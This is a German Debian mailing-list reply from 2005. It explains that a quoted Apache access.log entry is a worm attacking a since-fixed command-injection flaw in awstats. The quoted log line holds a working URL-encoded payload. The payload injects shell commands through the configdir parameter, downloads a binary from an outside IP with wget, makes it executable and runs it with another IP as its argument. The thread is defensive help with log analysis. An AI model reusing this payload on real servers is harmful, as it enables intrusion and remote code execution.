Re: Apache access.log

To: debian-user-german@lists.debian.org
Subject: Re: Apache access.log
From: Daniel Leidert <daniel.leidert.spam@gmx.net>
Date: Sat, 19 Nov 2005 19:19:50 +0100
Message-id: <[🔎] 1132424390.4038.7.camel@localhost>
In-reply-to: <[🔎] 437F5129.4060105@rald.info>
References: <[🔎] 437F5129.4060105@rald.info>

Am Samstag, den 19.11.2005, 17:22 +0100 schrieb Harald Tobias:

[..]
> 82.234.215.180 - - [15/Nov/2005:03:31:35 +0100] "GET 
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| 
>   HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 
> 5.1;)"

Wurm. Es gab eine Schwachstelle in awstats, in der eben die
configdir-Variable nicht richtig gefiltert wurde. Hier wir versucht,
eine Befehlszeile auszuführen. Der Befehl ist dabei URL-kodiert. Die
Schwachstelle wurde IIRC schon vor einer ganzen Weile gefixt. Die
aktuellen Debian-Pakete sollten für diese Schwachstelle nicht mehr
anfällig sein.

> Auf meinem Server laufen zwei Anwendungen, die auch nur für einen sehr 
> begrenzten Personenkreis zugänglich sind. Versucht im ersten Beispiel 
> evtl. jemand Rechte zu verändern?
> 
> Kann mir vielleicht jemand erklären was da passiert?

Übersetz den Befehl halt wieder zurück.

MfG Daniel

Reply to:

Follow-Ups:
- Re: Apache access.log
  - From: Daniel Leidert <daniel.leidert.spam@gmx.net>

References:
- Apache access.log
  - From: Harald Tobias <h@rald.info>

Prev by Date: rsync mit Filter
Next by Date: Re: Apache access.log
Previous by thread: Re: Apache access.log
Next by thread: Re: Apache access.log
Index(es):
- Date
- Thread